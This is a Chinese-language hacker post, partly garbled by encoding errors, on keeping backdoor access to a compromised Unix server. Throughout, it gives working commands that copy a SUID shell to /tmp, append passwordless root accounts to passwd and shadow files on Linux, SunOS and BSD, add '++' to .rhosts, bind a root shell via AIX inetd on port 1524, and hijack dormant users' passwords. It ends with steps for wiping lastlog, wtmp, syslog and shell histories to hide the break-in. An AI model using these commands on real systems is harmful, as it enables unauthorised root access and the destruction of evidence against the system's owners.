好不容易搞了臺服務(wù)器很不容易，如果被發(fā)現(xiàn)了就沒了！可惜?。?
其實(shí)，開后門的方法有很多種

1. setuid 
#cp /bin/sh /tmp/.sh
#chmod u+s /tmp/.sh
加上 suid 位到shell上，雖然很簡單，但容易被發(fā)現(xiàn) 

2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd
即給系統(tǒng)增加一個(gè) id 為 0（root)的帳號，無口令。
但管理員很快就可以發(fā)現(xiàn)哦！
3.echo "++">>/.rhosts 
如果這個(gè)系統(tǒng)開了512,513的port呵呵，就可以 
把一個(gè)名為hack加到.rhosts文件中，rlogin登陸，無要密碼！ 

4.修改 sendmail.cf文件 增加一個(gè)"wiz" 命令; 
然后telnet www.xxx.com 25后，wiz。。。。ok 
　
5。 改已有用戶密碼
如果主機(jī)上有好多用戶，當(dāng)你看到一個(gè)用戶好久沒登入了，就可以改他的密碼
#passwd 可用passwd命令。
6.rootkit后門包 
網(wǎng)上有好多地方下載，找找，自己試試看，我也在測試中！不會(huì)啊?。。?！
-Bsd 后門：
echo love::92:206::0:0::/:/bin/sh >> /etc/master.passwd 
/usr/sbin/pwd_mkdb /etc/master.passwd 

這里我添加一個(gè)love的用戶用戶的ID是92；ROOT的是0哦！ 
好了我們添加一個(gè)用戶了！那么權(quán)限不夠怎么辦呢？ 
cp /bin/sh /tmp/.x (這個(gè)x就是隨便選個(gè)，好像 .sh , .a , .b 等等）
chmod 777 /tmp/.x
chmod +s /tmp/.x
用這個(gè)給他做個(gè)小后門吧
以后我們登陸的這臺肉雞以后就可以用tmp/.x來提升權(quán)限了。

-AIX 后門 （Kelvinzhou教我的，感謝你）
echo "ingreslock stream tcp nowait root /bin/sh">>/tmp/.x 
/usr/sbin/inetd -s /tmp/.x 
rm /tmp/.x 
這樣你就可以telnet ip 1524直接得到rootshell 
-SunOs 后門
echo "love::0:0::/:/bin/bash" >> /etc/passwd
echo "love::::::::" >> /etc/shadow 
當(dāng)你以telnet上時(shí)，你就是root了！不過不保險(xiǎn)！
-Linux 后門
echo "love::0:0::/:/bin/bash" >> /etc/passwd
echo "love::::::::" >> /etc/shadow 
有時(shí)間的話，就多留幾個(gè)后門！
留了后門就要擦你的PP了，不是吧，這也忘了！
Unix系統(tǒng)日志文件通常是存放在 "/var/log　and /var/adm" 目錄下的。通常我們可以查看syslog.conf來看看日志配置的情況．如：cat /etc/syslog.conf
一般我們要清除的日志有 
lastlog 
utmp 
wtmp 
messages 
syslog 
sulog 
此外，各種shell還會(huì)記錄用戶使用的命令歷史，它使用用戶主目錄下的文件來記錄這些命令歷史，通常這個(gè)文件的名字為.sh_history (ksh)，.history (csh)，或.bash_history (bash)等。 
如果你有像wipe.c 那樣的清日志的程序，就可以讓它來做，不然的話就要手動(dòng)了! 建議不要用rm掉日志，最好是，把日志改編，
比如： 
#cat > /usr/log/lastlog 
　?。具@里是你要的寫的東西，也可以不輸入哦！
^d　－＞這里的^d是按鍵 ctrl + d！ 結(jié)束！
#
好了不說了，要學(xué)的還好多，我也很菜！see!

最新評論